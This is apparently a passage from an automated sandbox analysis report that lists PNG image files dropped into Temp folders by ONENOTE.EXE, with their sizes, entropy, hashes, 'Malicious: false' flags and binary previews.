Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Temp\{3C3959DE-D01D-49ED-9E1E-87AAA9485B5E}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Temp\{3D560280-0E63-4626-887D-75353C85E997}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Temp\{4073B913-19E7-437A-8813-4B51B3B1F839}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Temp\{43DA3B05-4C1A-4C6B-81FC-EE9F8D8EE14A}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Temp\{45451847-B466-47FE-81C1-D3EEB6D9BA6E}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Temp\{465B73E1-E8E0-44AC-8DA4-95361BB61CF3}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Temp\{465C168D-B24D-4E28-A957-BB84EDF97EC0}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Temp\{4993431A-1A4C-4DCE-9A49-CB87BAC1E2D3}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Temp\{4CC4DCFE-456D-4FC3-BBB3-80CF562CB4F2}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{4E9ECF5D-F75C-44B1-A07A-3DDCE39943FE}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Temp\{4EF43F3F-44E4-4DCE-B92C-E6A6080CCD39}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Temp\{551F8B94-D74A-4A39-AE9E-F7412F9FF27F}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Temp\{5532A2D2-D82D-4FDF-A653-8352FAF84B93}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k 